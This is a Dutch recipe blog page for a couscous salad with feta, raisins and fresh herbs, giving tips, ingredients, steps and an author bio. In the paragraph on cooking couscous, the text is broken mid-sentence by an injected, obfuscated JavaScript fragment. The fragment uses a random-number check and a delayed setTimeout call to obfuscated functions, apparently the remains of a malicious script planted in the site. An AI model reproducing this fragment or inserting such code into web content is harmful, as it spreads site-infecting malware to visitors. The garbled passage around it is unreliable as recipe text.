Couscous salade met feta, rozijnen en groene kruiden

Deze heerlijke couscous salade staat snel op tafel zodat je zo lang mogelijk van de zon kan genieten. Je kunt deze salade goed van te voren klaar maken als bijgerecht. Een kleine tip: Het allerlekkerst is deze salade met een lamsrackje van de BBQ. Probeer het zelf eens uit.

Hoe maak je couscous?

Vaak staat er op de verpakking dat je het in water moet koken. Zelf maak ik altijd bouillon om extra smaak mee te geven. Enkel garen in bouillon is vaak voldoende om goed te garen. Je hoeft het niet per se te koken, maar als je dit dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch wil dan is 2-3 minuten lang zat. De verhoudingen zijn ongeveer 100 gram couscous met één deel water/ bouillon. Je kunt het zowel warm als koud serveren.

Traditioneel wordt dit oude gerecht veel gegeten in Noord-Afrika en op Sicilië. Een echt nationaal gerecht zoals aardappelgerechten voor veel westerse landen. Couscous wordt over de hele wereld op verschillende manieren klaargemaakt; pittig, zoet, met vis en vlees. Alle combinaties zijn mogelijk, probeer vooral uit wat je zelf het lekkerst vindt.

Grote schalen en borden

Ik ben echt dol op servies, grote schalen en keramiek. Elke keer als ik weer iets tegen kom dan houd ik mezelf voor dat ik echt geen ruimte meer in de servieskast heb. Toch weet ik elke keer nog een plekje te vinden en de borden stapelen zich inmiddels flink op.

Als ik voor grote gezelschappen kook, gebruik ik altijd grote platte borden om uit te serveren. Dit ziet er niet alleen leuk uit, maar het is ook gewoon heel erg makkelijk. Waar ik deze koop? Echt overal! Op marktjes in het buitenland, maar ook IKEA heeft zo nu en dan leuke items!

Recept

Voorbereiding: 10 min.
Bereiding: 5 min.

Ingredienten

 • 500 gram couscous
 • 0,5 liter kippebouillon
 • halve bos verse koriander
 • halve bos verse peterselie
 • kwart bos verse munt
 • 1 rode peper
 • kaneel
 • 100 gram rozijnen
 • 300 gram verse feta (voorverpakt mag natuurlijk ook)

Aan de slag!

 1. Maak de kippenbouillon met wat kokend water
 2. Weeg de couscous af en giet een klein beetje bouillon op de couscous. Niet alles tegelijk, afhankelijk van hoe de couscous de bouillon absorbeert kun je meer bouillon toevoegen.
 3. Laat de couscous 10 min in de bouillon wellen.
 4. Wel de rozijnen een paar minuten in warm water en laat deze goed uitlekken.
 5. Snijd de rode peper en alle kruiden zo fijn mogelijk. Als je niet van pittig eten houdt kun je ook een halve rode peper gebruiken.
 6. Meng de rozijnen met een theelepel kaneel.
 7. Pak een grote schaal en strooi de couscous hier in. Laat de couscous afkoelen.
 8. Meng alle kruiden, de rode peper en de rozijnen door de couscous.
 9. Verkruimel met je handen de feta over de salade heen

Score

 • Score 5.0

User Rating

0 (0 Votes)

Summary

Score

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "Couscous salade met feta, rozijnen en groene kruiden"

  Plaats een reactie:

  Je emailadres wordt niet weergegeven.